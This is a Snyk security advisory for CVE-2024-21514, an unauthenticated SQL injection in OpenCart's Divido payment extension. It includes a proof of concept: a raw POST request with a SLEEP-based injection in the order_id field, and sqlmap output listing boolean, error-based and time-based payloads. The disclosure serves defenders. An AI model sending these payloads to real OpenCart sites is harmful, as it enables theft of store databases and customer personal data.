Homepage
About Snyk

SQL Injection Affecting opencart/opencart package, versions >=0.0.0

Severity

 Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.07% (30th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-PHP-OPENCARTOPENCART-7266565
  • published 21 Jun 2024
  • disclosed 21 Jun 2024
  • credit Calum Hutton
Report a new vulnerability Found a mistake?

Introduced: 21 Jun 2024

New CVE-2024-21514 Open this link in a new tab
CWE-89 Open this link in a new tab
First added by Snyk

How to fix?

A fix was pushed into the master branch but not yet published.

Overview

opencart/opencart is a shopping cart system

Affected versions of this package are vulnerable to SQL Injection. An SQL Injection issue was identified in the Divido payment extension for OpenCart, which is included by default in version 3.0.3.9. As an anonymous unauthenticated user, if the Divido payment module is installed (it does not have to be enabled), it is possible to exploit SQL injection to gain unauthorised access to the backend database. For any site which is vulnerable, any unauthenticated user could exploit this to dump the entire OpenCart database, including customer PII data.

PoC

This can be exploited with a POST request to /index.php?route=extension/payment/divido/update which will delay the response for 5 seconds.

POST http://localhost/index.php?route=extension/payment/divido/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/json
content-length: 44


{"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}

Using this request in SQLmap it identified three different payload types:

python3 sqlmap.py -vv -r /tmp/oc2.raw --level 3 --risk 2
...
Parameter: JSON #1* ((custom) POST)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
  Payload: {"status":true,"metadata":{"order_id":"1 AND 7610=(SELECT (CASE WHEN (7610=7610) THEN 7610 ELSE (SELECT 7298 UNION SELECT 8143) END))-- -"}}
  Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]


  Type: error-based
  Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
  Payload: {"status":true,"metadata":{"order_id":"1 AND EXTRACTVALUE(2524,CONCAT(0x5c,0x716a7a6a71,(SELECT (ELT(2524=2524,1))),0x71716b7071))"}}
  Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))


  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: {"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}
  Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

CVSS Scores

version 4.0
version 3.1
Expand this section

Snyk

Recommended
8.3 high
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Attack Requirements (AT)
    Partial
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Confidentiality (VC)
    None
  • Integrity (VI)
    High
  • Availability (VA)
    High
  • Confidentiality (SC)
    None
  • Integrity (SI)
    None
  • Availability (SA)
    None